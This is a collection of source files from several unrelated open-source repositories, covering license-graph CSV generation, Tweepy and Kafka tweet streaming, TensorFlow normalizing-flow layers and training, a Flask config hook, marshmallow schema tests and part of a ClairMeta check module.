# MPLv1.1 is incompatible with LGPL (the hardcoded id 70 below is assumed to be MPL-1.1's row in licenses.csv)
for lgpl in lgplVariations:
if (lgpl in licensesIdMap):
line_count += 1
licenseId = licensesIdMap[lgpl]
licenseIncompFile.write(f'70,{licenseId}\n')
print(f'Generated {line_count} possible license incompatibilities...')
```
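To illustrate what the generated file can be used for, here is a hedged sketch that reads `license-incompatibilities.csv` back and checks a single pair of ids; the helper function and the example ids are invented for illustration and are not part of the project.
```python
import csv

def is_incompatible(csv_path, license_a_id, license_b_id):
    """Return True if the pair (license_a_id, license_b_id) appears in the CSV."""
    with open(csv_path, newline="", encoding="utf-8") as fh:
        for row in csv.reader(fh):
            if row == [license_a_id, license_b_id]:
                return True
    return False

# '3' and '17' are placeholder ids used only for this illustration.
print(is_incompatible("license-incompatibilities.csv", "3", "17"))
```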
#### File: experiment/generator/projects.py
```python
import csv
import gzip
import os
def generate(dbmsImportPath, librariesIoDataPath, cutoff = -1, filterProjects = set()):
print('Opening and writing project header files...')
projectsHeaderFile = open(os.path.join(dbmsImportPath, 'projects_header.csv'), "w+", encoding="utf-8")
licensesHeaderFile = open(os.path.join(dbmsImportPath, 'licenses_header.csv'), "w+", encoding="utf-8")
projectLicensesHeaderFile = open(os.path.join(dbmsImportPath, 'project-licenses_header.csv'), "w+", encoding="utf-8")
projectsHeaderFile.write('projectId:ID(Project),platform,name,dependentRepositoriesCount')
licensesHeaderFile.write('licenseId:ID(License),name')
projectLicensesHeaderFile.write('projectId:START_ID(Project),licenseId:END_ID(License)')
projectsHeaderFile.close()
licensesHeaderFile.close()
projectLicensesHeaderFile.close()
print('Opening project files...')
projectsFile = open(os.path.join(dbmsImportPath, 'projects.csv'), "w", encoding="utf-8")
licensesFile = open(os.path.join(dbmsImportPath, 'licenses.csv'), "w", encoding="utf-8")
projectLicensesFile = open(os.path.join(dbmsImportPath, 'project-licenses.csv'), "w", encoding="utf-8")
licensesMap = {}
licensesId = 0
print('Generating projects...')
with open(os.path.join(librariesIoDataPath, "projects-1.6.0-2020-01-12.csv"), "r", encoding="utf-8") as f:
reader = csv.reader(f)
projectsWritten = 0
dualLicensedProjects = 0
line_count = 0
# skip first header line
next(reader)
for row in reader:
if (cutoff != -1 and line_count > cutoff):
break
line_count += 1
if (line_count % 500000 == 0):
print(line_count)
index = row[0]
platform = row[1]
name = row[2]
licenses = row[8]
dependentRepositoriesCount = row[19]
# Skip all projects that we should filter
if (len(filterProjects) > 0 and index not in filterProjects):
continue
projectNameFiltered = name.replace('"', "'")
if (licenses):
licenseArr = licenses.split(',')
# Skip licensing dual-licensed projects (we still need the
# project nodes for dependency chains, but we cannot answer
# anything with regards to their license because we have no
# idea which parts of the software are licensed under which
# license)
if (len(licenseArr) == 1):
license = licenseArr[0]
if (not license in licensesMap):
licensesMap[license] = licensesId
licensesFile.write(f'{licensesId},{license}\n')
licensesId += 1
licenseId = licensesMap.get(license)
projectLicensesFile.write(f'{index},{licenseId}\n')
else:
dualLicensedProjects += 1
projectsWritten += 1
projectsFile.write(f'{index},{platform},"{projectNameFiltered}",{dependentRepositoriesCount}\n')
print(f'Generated {projectsWritten} project nodes (skipped {line_count - projectsWritten}) with {dualLicensedProjects} of them being dual-licensed, and {licensesId} unique licenses...')
projectsFile.close()
licensesFile.close()
projectLicensesFile.close()
``` |
{
"source": "4lick/TweetActivityWithBeam",
"score": 3
} |
#### File: tweets-file/src/basic.py
```python
from __future__ import absolute_import, print_function
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
# Consumer key and secret
consumer_key="YOUR_CONSUMER_KEY"
consumer_secret="YOUR_CONSUMER_SECRET"
# Access token
access_token="YOUR_ACCESS_TOKEN"
access_token_secret="ACCESS_TOKEN_SECRET"
f = open('tweets.json', 'w')
class StdOutListener(StreamListener):
""" A listener handles tweets that are received from the stream. """
def on_data(self, data):
print(data)
f.write(data + '\n')
return True
def on_error(self, status):
print(status)
f.close()
if __name__ == '__main__':
l = StdOutListener()
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
stream = Stream(auth, l)
stream.filter(track=['elections', 'presidentielles', 'france'])
```
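Since `on_data` writes each payload as one JSON document per line, the resulting file can be parsed line by line; this is a small sketch under that assumption.
```python
import json

# Read back the file produced by the listener above, one JSON object per line.
with open("tweets.json", "r") as fh:
    for line in fh:
        line = line.strip()
        if not line:
            continue
        tweet = json.loads(line)
        # 'text' is present on standard tweet payloads; fall back to '' otherwise.
        print(tweet.get("text", ""))
```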
#### File: tweets-kafka/src/basic.py
```python
from __future__ import absolute_import, print_function
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
from kafka import KafkaProducer
from kafka.errors import KafkaError
import json
import datetime
import logging

log = logging.getLogger(__name__)
# Consumer key and secret
consumer_key="YOUR_CONSUMER_KEY"
consumer_secret="YOUR_CONSUMER_SECRET"
# Access token
access_token="YOUR_ACCESS_TOKEN"
access_token_secret="ACCESS_TOKEN_SECRET"
# kafka producer
producer = KafkaProducer(bootstrap_servers=['kafka:9092'], value_serializer=lambda m: json.dumps(m).encode('utf-8'))
class StdOutListener(StreamListener):
""" A listener handles tweets that are received from the stream. """
def on_data(self, data):
try:
self.c += 1
except:
self.c = 0
if self.c % 10 == 0:
print("%s - %d tweets sent" % (datetime.datetime.utcnow(), self.c))
future = producer.send('tweets-topic', data)
try:
record_metadata = future.get(timeout=10)
except KafkaError:
# Decide what to do if produce request failed...
log.exception('Failed to deliver tweet to Kafka')
pass
return True
def on_error(self, status):
print(status)
if __name__ == '__main__':
l = StdOutListener()
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
stream = Stream(auth, l)
stream.filter(track=['elections', 'presidentielles', 'france'])
``` |
{
"source": "4liharandi/Cycle-Normalizing-Flow",
"score": 2
} |
#### File: 4liharandi/Cycle-Normalizing-Flow/glow_ops.py
```python
import tensorflow as tf
from tensorflow.keras import layers
import scipy
import numpy as np
from Unet_util import Unet
from my_utils import *
class upsqueeze(layers.Layer):
def __init__(self, factor=2):
super(upsqueeze, self).__init__()
self.f = factor
def call(self, x, reverse=False):
f = self.f
# upsampling via squeeze
b, N1, N2, nch = x.get_shape().as_list()
if not reverse:
x = tf.reshape(
tf.transpose(
tf.reshape(x, shape=[b, N1//f, f, N2//f, f, nch]),
[0, 1, 3, 2, 4, 5]),
[b, N1//f, N2//f, nch*f*f])
else:
x = tf.reshape(tf.transpose(
tf.reshape(x, shape=[b, N1, N2, f, f, nch//f**2]),
[0, 1, 3, 2, 4, 5]), [b, N1*f, N2*f, nch//f**2])
return x, 0.0
class actnorm(layers.Layer):
"""Activation normalization layers that
initialized via data"""
def __init__(self, **kwargs):
super(actnorm, self).__init__()
# 'assigned' tracks whether the data-dependent initialization has run
self.assigned = False
def build(self, input_shape):
if len(input_shape) == 2:
self.b = self.add_weight(name='bias',
shape=(1, input_shape[1]),
trainable= True)
self.scale = self.add_weight(name='scale',
shape=(1, input_shape[1]),
trainable= True)
else:
self.b = self.add_weight(name='bias',
shape=(1, 1, 1, input_shape[3]),
trainable= True)
self.scale = self.add_weight(name='scale',
shape=(1, 1, 1, input_shape[3]),
trainable= True)
def call(self, x, reverse=False):
if len(x.shape) == 2:
red_axes = [0]
else:
red_axes = [0, 1, 2]
if not self.assigned:
"""https://github.com/tensorflow/tensor2tensor/blob/21dba2c1bdcc7ab582a2bfd8c0885c217963bb4f/tensor2tensor/models/research/glow_ops.py#L317"""
self.b.assign(-tf.reduce_mean(x, red_axes, keepdims=True))
x_var = tf.reduce_mean((x+self.b)**2, red_axes, keepdims=True)
init_value = tf.math.log(1.0/(tf.math.sqrt(x_var) + 1e-6))
self.scale.assign(init_value)
self.assigned = True
_, height, width, channels = x.get_shape().as_list()
if not reverse:
x += self.b
x *= tf.math.exp(self.scale)
else:
x *= tf.math.exp(-self.scale)
x -= self.b
log_s = self.scale
dlogdet = tf.reduce_sum(log_s)* \
tf.cast(height * width, log_s.dtype)
if reverse:
dlogdet *= -1
return x, dlogdet
class invertible_1x1_conv(layers.Layer):
"""Invertible 1x1 convolutional layers"""
def __init__(self, **kwargs):
super(invertible_1x1_conv, self).__init__()
self.type = kwargs.get('op_type', 'bijective')
self.gamma = kwargs.get('gamma', 0.0)
self.activation = kwargs.get('activation', 'linear')
def build(self, input_shape):
_, height, width, channels = input_shape
if self.type=='bijective':
random_matrix = np.random.randn(channels, channels).astype("float32")
np_w = scipy.linalg.qr(random_matrix)[0].astype("float32")
self.activation = 'linear'
self.LU = True
if self.LU:
np_p, np_l, np_u = scipy.linalg.lu(np_w)
np_s = np.diag(np_u)
np_sign_s = np.sign(np_s)
np_log_s = np.log(np.abs(np_s))
np_u = np.triu(np_u, k=1)
self.p = tf.Variable(np_p, name='P', trainable=False)
self.l = tf.Variable(np_l, name='L', trainable=True)
self.sign_s = tf.Variable(np_sign_s, name='sign_S',
trainable=False)
self.log_s = tf.Variable(np_log_s, name='log_S',
trainable=True)
self.u = tf.Variable(np_u, name='U',
trainable=True)
else:
self.w = tf.Variable(np_w, name='W', trainable=True)
else:
self.LU = False
if self.activation == 'linear':
random_matrix_1 = np.random.randn(channels//2, channels//2).astype("float32")
random_matrix_2 = np.random.randn(channels//2, channels//2).astype("float32")
np_w_1 = scipy.linalg.qr(random_matrix_1)[0].astype("float32")
np_w_2 = scipy.linalg.qr(random_matrix_2)[0].astype("float32")
np_w = np.concatenate([np_w_1, np_w_2], axis=0)/(np.sqrt(2.0))
elif self.activation == 'relu':
random_matrix_1 = np.random.randn(channels//2, channels//2).astype("float32")
np_w = scipy.linalg.qr(random_matrix_1)[0].astype("float32")
self.w = tf.Variable(np_w, name='W', trainable=True)
def call(self, x, reverse=False):
# If height or width cannot be statically determined then they end up as
# tf.int32 tensors, which cannot be directly multiplied with a floating
# point tensor without a cast.
_, height, width, channels = x.get_shape().as_list()
if self.type=='bijective':
if self.LU:
l_mask = tf.convert_to_tensor(np.tril(np.ones([channels, channels], dtype=np.float32), -1),
dtype=tf.float32)
l = self.l * l_mask + tf.eye(channels, channels)
u = self.u * tf.transpose(l_mask) + \
tf.linalg.diag(self.sign_s * tf.math.exp(self.log_s))
self.w = tf.matmul(self.p, tf.matmul(l, u))
objective = tf.reduce_sum(self.log_s) * \
tf.cast(height * width, self.log_s.dtype)
else:
s = tf.linalg.svd(self.w,
full_matrices=False, compute_uv=False)
self.log_s = tf.math.log(s + self.gamma**2/(s + 1e-8))
objective = tf.reduce_sum(self.log_s) * \
tf.cast(height * width, self.log_s.dtype)
else:
# s = tf.linalg.svd(self.w,
# full_matrices=False, compute_uv=False)
# self.log_s = tf.math.log(s + self.gamma**2/(s + 1e-8))
objective = 0.0
if not reverse:
if self.activation == 'relu':
x = x[:,:,:,:channels//2] - x[:,:,:,channels//2:]
w = tf.reshape(self.w , [1, 1] + self.w.get_shape().as_list())
x = tf.nn.conv2d(x, w, [1, 1, 1, 1], "SAME", data_format="NHWC")
else:
if self.activation=='relu':
prefactor = tf.matmul(self.w, self.w, transpose_a=True) + \
self.gamma**2*tf.eye(tf.shape(self.w)[1])
w_inv = tf.matmul(tf.linalg.inv(prefactor), self.w, transpose_b=True)
conv_filter = tf.concat([w_inv, -w_inv], axis=1)
conv_filter = tf.reshape(conv_filter, [1, 1] + conv_filter.get_shape().as_list())
x = tf.nn.conv2d(x, conv_filter, [1, 1, 1, 1], "SAME", data_format="NHWC")
x = tf.nn.relu(x)
else:
if self.LU == True:
perm = tf.argmax(self.p , axis = 0)
lower_upper = l + u - tf.eye(channels)
w_inv = tf.linalg.lu_matrix_inverse(lower_upper=lower_upper , perm = perm)
else:
prefactor = tf.matmul(self.w, self.w, transpose_a=True) + \
self.gamma**2*tf.eye(tf.shape(self.w)[1])
w_inv = tf.matmul( tf.linalg.inv(prefactor) , self.w, transpose_b=True)
conv_filter = w_inv
conv_filter = tf.reshape(conv_filter, [1, 1] + conv_filter.get_shape().as_list())
x = tf.nn.conv2d(x, conv_filter, [1, 1, 1, 1], "SAME", data_format="NHWC")
objective *= -1
return x, objective
class conv_stack(layers.Layer):
def __init__(self, mid_channels,
output_channels):
super(conv_stack, self).__init__()
self.conv1 = layers.Conv2D(
mid_channels, 3, 1, padding='same',
activation='relu', use_bias=False)
self.conv2 = layers.Conv2D(
mid_channels, 1, 1, padding='same',
activation='relu', use_bias=False)
self.conv3 = layers.Conv2D(
output_channels, 1, 1, padding='same', activation='sigmoid', use_bias=False,kernel_initializer='zeros')
def call(self, x):
return self.conv3(self.conv2(self.conv1(x)))
class affine_coupling(layers.Layer):
def __init__(self):
super(affine_coupling, self).__init__()
def build(self, input_shape):
out_channels = input_shape[-1]
self.conv_stack = conv_stack(128,out_channels) # regular convolutions
# self.conv_stack = Unet(out_channels) # Unet conv stack
def call(self, x, reverse=False):
x1, x2 = tf.split(x, num_or_size_splits=2, axis=-1)
z1 = x1
log_scale_and_shift = self.conv_stack(z1)
shift = log_scale_and_shift[:, :, :, 0::2]
scale = tf.math.exp(log_scale_and_shift[:, :, :, 1::2])
if not reverse:
z2 = (x2 + shift) *scale
else:
z2 = (x2/scale) - shift
objective = tf.reduce_sum(log_scale_and_shift[:, :, :, 1::2], axis=[1, 2, 3])
# objective = 0.0
if reverse:
objective *= -1
return tf.concat([z1, z2], axis=3), objective
class revnet_step(layers.Layer):
"""One layer of this is:
[1] Actnorm -- data normalization
[2] 1x1 conv -- permutation
[3] coupling layer -- Jacobian
"""
def __init__(self, **kwargs):
super(revnet_step, self).__init__()
self.layer_type = kwargs.get('layer_type', 'bijective')
self.mid_ch = kwargs.get('mid_channels', 128)
self.latent_model = kwargs.get('latent_model', False)
self.activation = kwargs.get('activation', 'linear')
self.norm = actnorm()
gamma = 1e-3 if self.latent_model else 1e-3
self.conv = invertible_1x1_conv(
op_type=self.layer_type , activation = self.activation , gamma = gamma)
self.coupling_layer = affine_coupling()
def call(self, x, reverse=False):
obj = 0.0
ops = [self.norm, self.conv, self.coupling_layer]
if reverse:
ops = ops[::-1]
for op in ops:
x, curr_obj = op(x, reverse=reverse)
obj += curr_obj
return x, obj
class revnet(layers.Layer):
"""Composition of revnet steps"""
def __init__(self, **kwargs):
super(revnet, self).__init__()
self.depth = kwargs.get('depth', 3)
self.latent_model = kwargs.get('latent_model', False)
self.steps = [revnet_step(layer_type = 'bijective',
latent_model = self.latent_model ,
activation = 'linear')
for _ in range(self.depth)]
def call(self, x, reverse=False):
objective = 0.0
if reverse:
steps = self.steps[::-1]
else:
steps = self.steps
for i in range(self.depth):
step = steps[i]
x, curr_obj = step(x,reverse=reverse)
objective += curr_obj
return x, objective
def unit_test_revnet_step():
MSE = tf.keras.losses.MeanSquaredError()
z = np.random.rand(10, 6, 6 , 12)
z = tf.convert_to_tensor(z , tf.float32)
rev = revnet(depth = 4)
x = rev(z , reverse = True)[0]
zhat = rev(x , reverse = False)[0]
tf.print(MSE(z, zhat))
if __name__ == '__main__':
# unit_test_ICL()  # not defined in this module, so only the revnet round-trip test is run
unit_test_revnet_step()
```
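A quick, hedged sanity check of the squeeze layer defined above: running it forward and then in reverse should reproduce the input exactly, since it only reshuffles values. The tensor shape is arbitrary and the import assumes the file is importable as `glow_ops`.
```python
import numpy as np
import tensorflow as tf
from glow_ops import upsqueeze  # assumes the module above is on the path

x = tf.convert_to_tensor(np.random.rand(2, 8, 8, 3), tf.float32)
sq = upsqueeze(factor=2)

y, _ = sq(x)                      # squeezed to shape (2, 4, 4, 12)
x_back, _ = sq(y, reverse=True)   # back to shape (2, 8, 8, 3)

# Maximum reconstruction error should be exactly zero (pure reshuffling).
print(float(tf.reduce_max(tf.abs(x - x_back))))
```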
#### File: 4liharandi/Cycle-Normalizing-Flow/train_bijective.py
```python
from my_models import generator, latent_generator
import tensorflow_probability as tfp
import tensorflow as tf
from tensorflow.keras import layers
import numpy as np
import cv2
from my_utils import *
import os
import shutil
from time import time
tfb = tfp.bijectors
tfd = tfp.distributions
FLAGS, unparsed = flags()
num_epochs = FLAGS.num_epochs
batch_size = FLAGS.batch_size
dataset = FLAGS.dataset
lr = FLAGS.lr
gpu_num = FLAGS.gpu_num
learntop = bool(FLAGS.learntop)
remove_all = bool(FLAGS.remove_all)
desc = FLAGS.desc
ml_threshold = FLAGS.ml_threshold
model_depth = FLAGS.model_depth
latent_depth = FLAGS.latent_depth
inv_conv_activation = FLAGS.inv_conv_activation
T = FLAGS.T
all_experiments = 'experiment_results/'
if os.path.exists(all_experiments) == False:
os.mkdir(all_experiments)
# experiment path
exp_path = all_experiments + 'Bijective_' + \
dataset + '_' + 'model_depth_%d' % (model_depth,) + '_' + 'latent_depth_%d'% (latent_depth,) + '_learntop_%d' \
% (int(learntop)) + '_' + desc
if os.path.exists(exp_path) == True and remove_all == True:
shutil.rmtree(exp_path)
if os.path.exists(exp_path) == False:
os.mkdir(exp_path)
gpus = tf.config.experimental.list_physical_devices('GPU')
if gpus:
# Restrict TensorFlow to only use the selected GPU
try:
tf.config.experimental.set_visible_devices(gpus[gpu_num], 'GPU')
tf.config.experimental.set_memory_growth(gpus[gpu_num], True)
except RuntimeError as e:
# Visible devices must be set before GPUs have been initialized
print(e)
class Prior(layers.Layer):
"""Defines the low dimensional distribution as Guassian"""
def __init__(self, **kwargs):
super(Prior, self).__init__()
latent_dim = kwargs.get('latent_dim', 64)
self.mu = tf.Variable(tf.zeros(latent_dim),
dtype=tf.float32, trainable=learntop)
self.logsigma = tf.Variable(tf.zeros(latent_dim),
dtype=tf.float32, trainable=learntop)
self.prior = tfd.MultivariateNormalDiag(
self.mu, tf.math.exp(self.logsigma))
def latent_space_interplotion(model, x1, x2, latent=True , sample_number = 16):
"""Creates a grid of images from x1 to x2"""
if not latent:
"""if latent then x1 and x2 are treated to be latent codes"""
z1, _ = model(x1, reverse=True)
z2, _ = model(x2, reverse=True)
else:
z1 = x1
z2 = x2
# create a grid of latent codes
a = tf.cast(tf.reshape(tf.linspace(0, 1, sample_number), (sample_number, 1)), tf.float32)
z = z1 + a * (z2 - z1)
xhat = model(z, reverse= True)[0]
return xhat.numpy()
def train(num_epochs,
batch_size,
dataset,
lr,
exp_path,):
# Print the experiment setup:
print('Experiment setup:')
print('---> num_epochs: {}'.format(num_epochs))
print('---> batch_size: {}'.format(batch_size))
print('---> dataset: {}'.format(dataset))
print('---> Learning rate: {}'.format(lr))
print('---> experiment path: {}'.format(exp_path))
if os.path.exists(os.path.join(exp_path, 'logs')):
shutil.rmtree(os.path.join(exp_path, 'logs'))
ML_log_dir = os.path.join(exp_path, 'logs', 'ML')
ML_summary_writer = tf.summary.create_file_writer(ML_log_dir)
ML_loss_metric = tf.keras.metrics.Mean('ML_loss', dtype=tf.float32)
pz_log_dir = os.path.join(exp_path, 'logs', 'pz')
pz_summary_writer = tf.summary.create_file_writer(pz_log_dir)
pz_metric = tf.keras.metrics.Mean(
'pz', dtype=tf.float32)
jacobian_log_dir = os.path.join(exp_path, 'logs', 'jacobian')
jacobian_summary_writer = tf.summary.create_file_writer(jacobian_log_dir)
jacobian_metric = tf.keras.metrics.Mean(
'jacobian', dtype=tf.float32)
train_dataset , test_dataset = Dataset_preprocessing(dataset=dataset ,batch_size = batch_size)
print('Dataset is loaded: training and test dataset shape: {} {}'.
format(np.shape(next(iter(train_dataset))), np.shape(next(iter(test_dataset)))))
_ , image_size , _ , c = np.shape(next(iter(train_dataset)))
latent_dim = image_size * image_size * c
initial_learning_rate = lr
# steps = num_epochs * ( 60000//batch_size)
# print(lr)
# lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(
# initial_learning_rate,
# decay_steps=steps//2,
# decay_rate=0.3,
# staircase=True)
f_optimizer = tf.keras.optimizers.Adam(learning_rate=lr)
pz = Prior(latent_dim = latent_dim)
time_vector = np.zeros([num_epochs,1]) # time per epoch
latent_model = latent_generator(network = 'bijective',revnet_depth = latent_depth,
c = c,
image_size = image_size) # Bijective network
# call generator once to set weights (Data dependent initialization)
dummy_x = next(iter(train_dataset))
dummy_z , _ = latent_model(dummy_x, reverse=False)
ckpt = tf.train.Checkpoint(pz = pz,latent_model=latent_model,f_optimizer=f_optimizer)
manager = tf.train.CheckpointManager(
ckpt, os.path.join(exp_path, 'checkpoints'), max_to_keep=5)
ckpt.restore(manager.latest_checkpoint)
@tf.function
def train_step_ml(sample):
"""ML training of the Injective network"""
with tf.GradientTape() as tape:
latent_sample, obj = latent_model(sample, reverse=False)
p = -tf.reduce_mean(pz.prior.log_prob(latent_sample))
j = -tf.reduce_mean(obj) # Log-det of Jacobian
loss = p + j
variables = tape.watched_variables()
grads = tape.gradient(loss, variables)
f_optimizer.apply_gradients(zip(grads, variables))
return loss , p , j
if manager.latest_checkpoint:
print("Restored from {}".format(manager.latest_checkpoint))
else:
print("Initializing from scratch.")
for epoch in range(num_epochs):
epoch_start = time()
# ML training of the bijective network after ml threshold epochs
for x in train_dataset:
ml_loss , p , j = train_step_ml(x)
if epoch == 0:
# Just for the first iteration of the first epoch
# to calculate the number of trainable parameters
with tf.GradientTape() as tape:
_, _ = latent_model(x, reverse=False)
variables_latent_model = tape.watched_variables()
parameters_latent_model = np.sum([np.prod(v.get_shape().as_list()) for v in variables_latent_model])
print('Number of trainable_parameters of bijective model: {}'.format(parameters_latent_model))
ML_loss_metric.update_state(ml_loss)
pz_metric.update_state(p)
jacobian_metric.update_state(j)
sample_number = 25 # Number of samples to show
# Sampling from distribution
z_random_base = pz.prior.sample(sample_number) # sampling from base (Gaussian) with Temperature = 1
z_random_base_T = (z_random_base - pz.mu) * T + pz.mu # sampling from base (Gaussian) with Temperature = T
x_sampled = latent_model(z_random_base , reverse = True)[0].numpy() # Intermediate samples with Temperature = 1
x_sampled_T = latent_model(z_random_base_T , reverse = True)[0].numpy() # Intermediate samples with Temperature = T
# Saving experiment results
samples_folder = os.path.join(exp_path, 'Generated_samples')
if not os.path.exists(samples_folder):
os.mkdir(samples_folder)
ngrid = int(np.sqrt(sample_number))
image_path_sampled = os.path.join(samples_folder, 'sampled')
if os.path.exists(image_path_sampled) == False:
os.mkdir(image_path_sampled)
cv2.imwrite(os.path.join(image_path_sampled, 'sampled_epoch %d.png' % (epoch,)),
x_sampled[:, :, :, ::-1].reshape(
ngrid, ngrid,
image_size, image_size, c).swapaxes(1, 2)
.reshape(ngrid*image_size, -1, c)*127.5 + 127.5) # samples from distribution with Temperature = 1
cv2.imwrite(os.path.join(image_path_sampled, 'Temperature_sampled_epoch %d.png' % (epoch,)),
x_sampled_T[:, :, :, ::-1].reshape(
ngrid, ngrid,
image_size, image_size, c).swapaxes(1, 2)
.reshape(ngrid*image_size, -1, c)*127.5 + 127.5) # samples from distribution with Temperature = T
# Saving logs
with ML_summary_writer.as_default():
tf.summary.scalar(
'ML_loss', ML_loss_metric.result(), step=epoch)
with pz_summary_writer.as_default():
tf.summary.scalar(
'pz', pz_metric.result(), step=epoch)
with jacobian_summary_writer.as_default():
tf.summary.scalar(
'jacobian', jacobian_metric.result(), step=epoch)
print("Epoch {:03d}: ML Loss: {:.3f} "
.format(epoch, ML_loss_metric.result().numpy()))
ML_loss_metric.reset_states()
pz_metric.reset_states()
jacobian_metric.reset_states()
save_path = manager.save()
print("Saved checkpoint for epoch {}: {}".format(epoch, save_path))
epoch_end = time()
time_vector[epoch] = epoch_end - epoch_start
np.save(os.path.join(exp_path, 'time_vector.npy') , time_vector)
print('epoch time:{}'.format(time_vector[epoch]))
if __name__ == '__main__':
train(num_epochs,
batch_size,
dataset,
lr,
exp_path)
``` |
{
"source": "4linux/HandsOn-Flask-App",
"score": 2
} |
#### File: app/extentions/configuration.py
```python
from dynaconf import FlaskDynaconf
def init_app(app):
conf = FlaskDynaconf(app)
return conf
``` |
{
"source": "4lissonsilveira/marshmallow",
"score": 2
} |
#### File: marshmallow/tests/test_options.py
```python
from collections import OrderedDict
import pytest
from marshmallow import fields, Schema
from marshmallow.exceptions import ValidationError
from tests.base import * # noqa
class TestStrict:
class StrictUserSchema(UserSchema):
class Meta:
strict = True
def test_strict_meta_option(self):
with pytest.raises(ValidationError):
self.StrictUserSchema().load({'email': 'foo.com'})
def test_strict_meta_option_is_inherited(self):
class StrictUserSchema(UserSchema):
class Meta:
strict = True
class ChildStrictSchema(self.StrictUserSchema):
pass
with pytest.raises(ValidationError):
ChildStrictSchema().load({'email': 'foo.com'})
class TestUnordered:
class UnorderedSchema(Schema):
name = fields.Str()
email = fields.Str()
class Meta:
ordered = False
def test_unordered_dump_returns_dict(self):
schema = self.UnorderedSchema()
u = User('steve', email='<EMAIL>')
result = schema.dump(u)
assert not isinstance(result.data, OrderedDict)
assert type(result.data) is dict
def test_unordered_load_returns_dict(self):
schema = self.UnorderedSchema()
result = schema.load({'name': 'steve', 'email': '<EMAIL>'})
assert not isinstance(result.data, OrderedDict)
assert type(result.data) is dict
class KeepOrder(Schema):
class Meta:
ordered = True
name = fields.String(allow_none=True)
email = fields.Email(allow_none=True)
age = fields.Integer()
created = fields.DateTime()
id = fields.Integer(allow_none=True)
homepage = fields.Url()
birthdate = fields.Date()
class OrderedMetaSchema(Schema):
id = fields.Int(allow_none=True)
email = fields.Email(allow_none=True)
class Meta:
fields = ('name', 'email', 'age', 'created',
'id', 'homepage', 'birthdate')
ordered = True
class OrderedNestedOnly(Schema):
class Meta:
ordered = True
user = fields.Nested(KeepOrder)
class TestFieldOrdering:
@pytest.mark.parametrize('with_meta', (False, True))
def test_ordered_option_is_inherited(self, user, with_meta):
class ParentUnordered(Schema):
class Meta:
ordered = False
# KeepOrder is before ParentUnordered in MRO,
# so ChildOrderedSchema will be ordered
class ChildOrderedSchema(KeepOrder, ParentUnordered):
if with_meta:
class Meta:
pass
schema = ChildOrderedSchema()
assert schema.opts.ordered is True
assert schema.dict_class == OrderedDict
data, errors = schema.dump(user)
assert not errors
keys = list(data)
assert keys == ['name', 'email', 'age', 'created', 'id', 'homepage', 'birthdate']
# ParentUnordered is before KeepOrder in MRO,
# so ChildUnorderedSchema will be unordered
class ChildUnorderedSchema(ParentUnordered, KeepOrder):
class Meta:
pass
schema = ChildUnorderedSchema()
assert schema.opts.ordered is False
def test_ordering_is_off_by_default(self):
class DummySchema(Schema):
pass
schema = DummySchema()
assert schema.ordered is False
def test_declared_field_order_is_maintained_on_dump(self, user):
ser = KeepOrder()
data, errs = ser.dump(user)
keys = list(data)
assert keys == ['name', 'email', 'age', 'created', 'id', 'homepage', 'birthdate']
def test_declared_field_order_is_maintained_on_load(self, serialized_user):
schema = KeepOrder()
data, errs = schema.load(serialized_user.data)
assert not errs
keys = list(data)
assert keys == ['name', 'email', 'age', 'created', 'id', 'homepage', 'birthdate']
def test_nested_field_order_with_only_arg_is_maintained_on_dump(self, user):
schema = OrderedNestedOnly()
data, errs = schema.dump({'user': user})
user_data = data['user']
keys = list(user_data)
assert keys == ['name', 'email', 'age', 'created', 'id', 'homepage', 'birthdate']
def test_nested_field_order_with_only_arg_is_maintained_on_load(self):
schema = OrderedNestedOnly()
data, errs = schema.load({'user': {
'name': 'Foo',
'email': '<EMAIL>',
'age': 42,
'created': dt.datetime.now().isoformat(),
'id': 123,
'homepage': 'http://foo.com',
'birthdate': dt.datetime.now().isoformat(),
}})
user_data = data['user']
keys = list(user_data)
assert keys == ['name', 'email', 'age', 'created', 'id', 'homepage', 'birthdate']
def test_nested_field_order_with_exclude_arg_is_maintained(self, user):
class HasNestedExclude(Schema):
class Meta:
ordered = True
user = fields.Nested(KeepOrder, exclude=('birthdate', ))
ser = HasNestedExclude()
data, errs = ser.dump({'user': user})
user_data = data['user']
keys = list(user_data)
assert keys == ['name', 'email', 'age', 'created', 'id', 'homepage']
def test_meta_fields_order_is_maintained_on_dump(self, user):
ser = OrderedMetaSchema()
data, errs = ser.dump(user)
keys = list(data)
assert keys == ['name', 'email', 'age', 'created', 'id', 'homepage', 'birthdate']
def test_meta_fields_order_is_maintained_on_load(self, serialized_user):
schema = OrderedMetaSchema()
data, errs = schema.load(serialized_user.data)
assert not errs
keys = list(data)
assert keys == ['name', 'email', 'age', 'created', 'id', 'homepage', 'birthdate']
class TestIncludeOption:
class AddFieldsSchema(Schema):
name = fields.Str()
class Meta:
include = {
'from': fields.Str()
}
def test_fields_are_added(self):
s = self.AddFieldsSchema()
in_data = {'name': 'Steve', 'from': 'Oskosh'}
result = s.load(in_data)
assert result.data == in_data
def test_ordered_included(self):
class AddFieldsOrdered(Schema):
name = fields.Str()
email = fields.Str()
class Meta:
include = OrderedDict([
('from', fields.Str()),
('in', fields.Str()),
('@at', fields.Str())
])
ordered = True
s = AddFieldsOrdered()
in_data = {'name': 'Steve', 'from': 'Oskosh', 'email': '<EMAIL>',
'in': 'VA', '@at': 'Charlottesville'}
# declared fields, then "included" fields
expected_fields = ['name', 'email', 'from', 'in', '@at']
assert list(AddFieldsOrdered._declared_fields.keys()) == expected_fields
result = s.load(in_data)
assert list(result.data.keys()) == expected_fields
def test_added_fields_are_inherited(self):
class AddFieldsChild(self.AddFieldsSchema):
email = fields.Str()
s = AddFieldsChild()
assert 'email' in s._declared_fields.keys()
assert 'from' in s._declared_fields.keys()
assert isinstance(s._declared_fields['from'], fields.Str)
``` |
{
"source": "4lm/ClairMeta",
"score": 2
} |
#### File: ClairMeta/clairmeta/dcp_check_base.py
```python
import six
import time
import inspect
import traceback
from clairmeta.logger import get_log
from clairmeta.utils.file import human_size
class CheckException(Exception):
""" All check shall raise a CheckException in case of falure. """
def __init__(self, msg):
super(CheckException, self).__init__(six.ensure_str(msg))
class CheckExecution(object):
""" Check execution with status and time elapsed. """
def __init__(self, name):
self.name = name
self.doc = ""
self.msg = ""
self.valid = False
self.seconds_elapsed = 0
self.asset_stack = []
self.criticality = ""
